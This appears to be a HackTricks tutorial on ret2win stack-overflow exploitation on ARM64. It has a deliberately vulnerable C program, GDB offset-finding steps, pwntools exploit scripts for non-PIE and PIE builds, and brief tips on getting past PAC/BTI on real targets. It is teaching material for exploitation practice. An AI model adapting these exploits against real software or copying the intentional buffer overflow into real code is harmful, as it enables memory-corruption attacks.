Ret2win - arm64


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Find an introduction to arm64 in:

Introduction to ARM64v8

Code

```c
#include <stdio.h>
#include <unistd.h>

void win() {
    printf("Congratulations!\n");
}

void vulnerable_function() {
    char buffer[64];
    read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability: up to 256 bytes into a 64-byte buffer
}

int main() {
    vulnerable_function();
    return 0;
}
```

Compile without PIE and without a canary:

```bash
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie -mbranch-protection=none
```

  • The extra flag -mbranch-protection=none disables AArch64 Branch Protection (PAC/BTI). If your toolchain enables PAC or BTI by default, this keeps the lab reproducible. To check whether the built binary uses PAC/BTI you can:
    • Look for the AArch64 GNU property note (readelf prints it as "AArch64 feature: BTI, PAC"):
      readelf --notes -W ret2win | grep -iE 'AArch64 feature|BTI|PAC'
    • Inspect prologues/epilogues for paciasp/autiasp (PAC) or for bti c landing pads (BTI):
      objdump -d ret2win | head -n 40

Quick facts about the AArch64 calling convention

  • The link register is x30 (a.k.a. lr), and functions typically save x29/x30 with stp x29, x30, [sp, #-16]! and restore them with ldp x29, x30, [sp], #16; ret.
  • This means the saved return address lives at sp+8 relative to the frame base. With a char buffer[64] placed below it, the usual overwrite distance to the saved x30 is 64 (buffer) + 8 (saved x29) = 72 bytes, exactly what we'll find below.
  • The stack pointer must remain 16-byte aligned at function boundaries. If you build ROP chains later for more complex scenarios, keep the SP alignment or you may crash in function epilogues.

Finding the offset

Pattern option

This example was created using GEF:

Start gdb with gef, create a pattern and use it:

```bash
gdb -q ./ret2win
pattern create 200
run
```

arm64 will try to return to the address in the x30 register (which was corrupted), so we can use that to find the pattern offset:

```bash
pattern search $x30
```

The offset is 72 (0x48).

Stack offset option

Start by getting the stack address where the pc register is saved:

```bash
gdb -q ./ret2win
b *vulnerable_function + 0xc
run
info frame
```

Now set a breakpoint after the read(), continue until the read() is executed, and send a pattern such as 13371337:

```bash
b *vulnerable_function+28
c
```

Find where this pattern is stored in memory:

Then: 0xfffffffff148 - 0xfffffffff100 = 0x48 = 72
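As an added, stand-alone illustration of what GEF's pattern create / pattern search do, and of the frame layout from the calling-convention notes above, the following Python (written for this page, not GEF's or pwntools' code) uses only the standard library: it generates a de Bruijn cyclic pattern, simulates the overflow into a frame laid out as buffer[64] + saved x29 + saved x30, and recovers the offset from the value that would land in x30. The frame sizes are the ones the C program above produces with the clang flags shown; the simulated frame is a constructed stand-in for a real crash, not a debugger capture.

```python
import string

ALPHABET = string.ascii_lowercase.encode()


def cyclic_pattern(length: int, n: int = 4, alphabet: bytes = ALPHABET) -> bytes:
    """Prefix of a de Bruijn sequence: every n-byte window is unique, which is
    what makes a 'pattern search' unambiguous (same idea as GEF/pwntools cyclic)."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t: int, p: int) -> None:
        if len(out) >= length:
            return
        if t > n:
            if n % p == 0:
                out.extend(alphabet[i] for i in a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                if len(out) >= length:
                    return
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out[:length])


def find_offset(pattern: bytes, reg_value: int, width: int = 8) -> int:
    """Equivalent of 'pattern search $x30': the register holds the 8 pattern
    bytes that overwrote the saved LR, stored little-endian on AArch64."""
    needle = reg_value.to_bytes(width, "little")
    return pattern.find(needle)  # -1 if the value did not come from the pattern


def simulate_clobbered_x30(payload: bytes, buf_size: int = 64) -> int:
    """Constructed stand-in for the crash: read() copies the payload into
    buffer[buf_size]; directly above it sit saved x29 (8 bytes) and saved x30
    (8 bytes), so the LR that 'ret' loads comes from payload[buf_size+8:+16]."""
    lr_off = buf_size + 8
    saved_lr = payload[lr_off:lr_off + 8]
    return int.from_bytes(saved_lr, "little")


if __name__ == "__main__":
    pat = cyclic_pattern(200)
    x30 = simulate_clobbered_x30(pat)
    print(f"x30 = {x30:#018x} -> offset {find_offset(pat, x30)}")  # offset 72
```

With the defaults the pattern starts "aaaabaaacaaad..." like pwntools' cyclic(), and the recovered offset is 72, matching both GEF methods above.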

No PIE

Regular

Get the address of the win function:

```bash
objdump -d ret2win | grep win
ret2win:     file format elf64-littleaarch64
00000000004006c4 <win>:
```

Exploit:

```python
from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Optional but nice for AArch64
context.arch = 'aarch64'

# Prepare the payload: 72 bytes of filler reach the saved x30, then the address of win
offset = 72
ret2win_addr = p64(0x00000000004006c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()
```

Off-by-1

Actually this will be more like an off-by-2 on the saved PC in the stack. Instead of overwriting the whole return address, we overwrite only its last 2 bytes with 0x06c4.

```python
from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload: only the two low bytes of the saved x30 are replaced
offset = 72
ret2win_addr = p16(0x06c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()
```

You can find another off-by-one example on ARM64 at https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/, which is a real off-by-one in a fictitious vulnerability.

With PIE

tip

Compile the binary without the -no-pie argument

Off-by-2

Without a leak we don't know the exact address of the win function, but we can know the function's offset inside the binary, and since the return address we are overwriting already points to a nearby address, it's possible to leak the offset of the win function (0x7d4 in this case) and just use that offset. Because only the low 16 bits are replaced, this lands on win only when win and the original return address share bits 16 and up, and bits 12-15 of the value you write must also match the randomized load base (PIE keeps the low 12 bits fixed, since the base is page aligned):

```python
from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload: overwrite only the two low bytes with win's offset in the binary
offset = 72
ret2win_addr = p16(0x07d4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()
```

Notes on modern AArch64 hardening (PAC/BTI) and ret2win

  • If the binary is built with AArch64 Branch Protection, you may see paciasp/autiasp or bti c emitted in function prologues/epilogues. In that case:
    • Returning to an address that is not a valid BTI landing pad can raise SIGILL. Target the real function entry that contains bti c.
    • If PAC is enabled for returns, a naive return-address overwrite may fail because the epilogue authenticates x30. For training, rebuild with -mbranch-protection=none (shown above). On real targets, prefer non-return hijacks (e.g. function pointer overwrites) or build a ROP chain that never executes an autiasp/ret pair that validates your forged LR.
  • Quick attribute check:
    • readelf --notes -W ./ret2win and look for the AArch64 feature property reporting BTI / PAC (the GNU_PROPERTY_AARCH64_FEATURE_1_BTI / _PAC bits).
    • objdump -d ./ret2win | head -n 40 and look for bti c, paciasp, autiasp.
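To complement the readelf / objdump checks listed here and in the build section above, the following is an added Python example (written for this page; it is not HackTricks, GEF or toolchain code) that walks the program headers of an ELF64 file, finds the PT_GNU_PROPERTY segment and reports whether the GNU_PROPERTY_AARCH64_FEATURE_1_AND bitmask has the BTI and PAC bits set. It uses only the standard library; the constants are the values defined by the ELF gABI and the AArch64 ELF ABI, and the minimal ELF64 image it builds in memory is constructed test data so the check can be exercised offline. Pass a path (e.g. ./ret2win) to inspect a real build.

```python
import struct
import sys

# Constants from the ELF gABI / AArch64 ELF ABI
NT_GNU_PROPERTY_TYPE_0 = 5
PT_GNU_PROPERTY = 0x6474E553
GNU_PROPERTY_AARCH64_FEATURE_1_AND = 0xC0000000
GNU_PROPERTY_AARCH64_FEATURE_1_BTI = 1 << 0
GNU_PROPERTY_AARCH64_FEATURE_1_PAC = 1 << 1
EM_AARCH64 = 183


def _align(n: int, a: int) -> int:
    return (n + a - 1) & ~(a - 1)


def parse_gnu_property_note(note: bytes) -> dict:
    """Parse one .note.gnu.property blob (ELF64 layout: each property in the
    descriptor is padded to 8 bytes) and return {'bti': bool, 'pac': bool}."""
    flags = {"bti": False, "pac": False}
    if len(note) < 12:
        return flags
    namesz, descsz, ntype = struct.unpack_from("<III", note, 0)
    name = note[12:12 + namesz]
    if ntype != NT_GNU_PROPERTY_TYPE_0 or name != b"GNU\0":
        return flags
    off = 12 + _align(namesz, 4)
    end = min(off + descsz, len(note))
    while off + 8 <= end:
        pr_type, pr_datasz = struct.unpack_from("<II", note, off)
        off += 8
        if pr_type == GNU_PROPERTY_AARCH64_FEATURE_1_AND and pr_datasz >= 4 and off + 4 <= end:
            (mask,) = struct.unpack_from("<I", note, off)
            flags["bti"] = bool(mask & GNU_PROPERTY_AARCH64_FEATURE_1_BTI)
            flags["pac"] = bool(mask & GNU_PROPERTY_AARCH64_FEATURE_1_PAC)
        off += _align(pr_datasz, 8)
    return flags


def check_elf_bytes(data: bytes) -> dict:
    """Walk the program headers of a little-endian AArch64 ELF64 image and parse
    its PT_GNU_PROPERTY segment (the same data `readelf --notes` prints)."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    (e_machine,) = struct.unpack_from("<H", data, 0x12)
    if e_machine != EM_AARCH64:
        raise ValueError("not an AArch64 binary")
    (e_phoff,) = struct.unpack_from("<Q", data, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    for i in range(e_phnum):
        ph = e_phoff + i * e_phentsize
        p_type, _p_flags, p_offset = struct.unpack_from("<IIQ", data, ph)
        (p_filesz,) = struct.unpack_from("<Q", data, ph + 32)
        if p_type == PT_GNU_PROPERTY:
            return parse_gnu_property_note(data[p_offset:p_offset + p_filesz])
    return {"bti": False, "pac": False}  # no property note: neither feature is advertised


def check_elf_file(path: str) -> dict:
    with open(path, "rb") as f:
        return check_elf_bytes(f.read())


def build_gnu_property_note(mask: int) -> bytes:
    """Construct a note laid out the way the linker emits it (test data only)."""
    desc = struct.pack("<IIII", GNU_PROPERTY_AARCH64_FEATURE_1_AND, 4, mask, 0)
    return struct.pack("<III", 4, len(desc), NT_GNU_PROPERTY_TYPE_0) + b"GNU\0" + desc


def build_minimal_elf64(mask: int) -> bytes:
    """Constructed ELF64 image: header + one PT_GNU_PROPERTY phdr + the note.
    Not loadable, just enough structure for check_elf_bytes() to walk."""
    note = build_gnu_property_note(mask)
    note_off = 64 + 56  # right after the ELF header and the single program header
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", 2, EM_AARCH64, 1, 0x400000,
                               64, 0, 0, 64, 56, 1, 64, 0, 0)
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_PROPERTY, 4, note_off, 0, 0,
                       len(note), len(note), 8)
    return ehdr + phdr + note


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    res = check_elf_file(target) if target else check_elf_bytes(build_minimal_elf64(0b11))
    print(f"BTI={res['bti']} PAC={res['pac']}")
```

A binary built with -mbranch-protection=none as above should report BTI=False PAC=False; a distro toolchain that defaults to -mbranch-protection=standard will show both set, which is when the SIGILL and x30-authentication caveats above apply.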

Running on non-ARM64 hosts (qemu-user quick tip)

If you are on x86_64 but want to practice AArch64:

```bash
# Install qemu-user and AArch64 libs (Debian/Ubuntu)
sudo apt-get install qemu-user qemu-user-static libc6-arm64-cross

# Run the binary with the AArch64 loader environment
qemu-aarch64 -L /usr/aarch64-linux-gnu ./ret2win

# Debug with GDB (qemu-user gdbstub)
qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./ret2win &
# In another terminal
gdb-multiarch ./ret2win -ex 'target remote :1234'
```

Related HackTricks pages

Ret2syscall - ARM64

Ret2lib + Printf leak - arm64

References

  • Enabling PAC and BTI on AArch64 for Linux (Arm Community, Nov 2024). https://community.arm.com/arm-community-blogs/b/operating-systems-blog/posts/enabling-pac-and-bti-on-aarch64-for-linux
  • Procedure Call Standard for the Arm 64-bit Architecture (AAPCS64). https://github.com/ARM-software/abi-aa/blob/main/aapcs64/aapcs64.rst
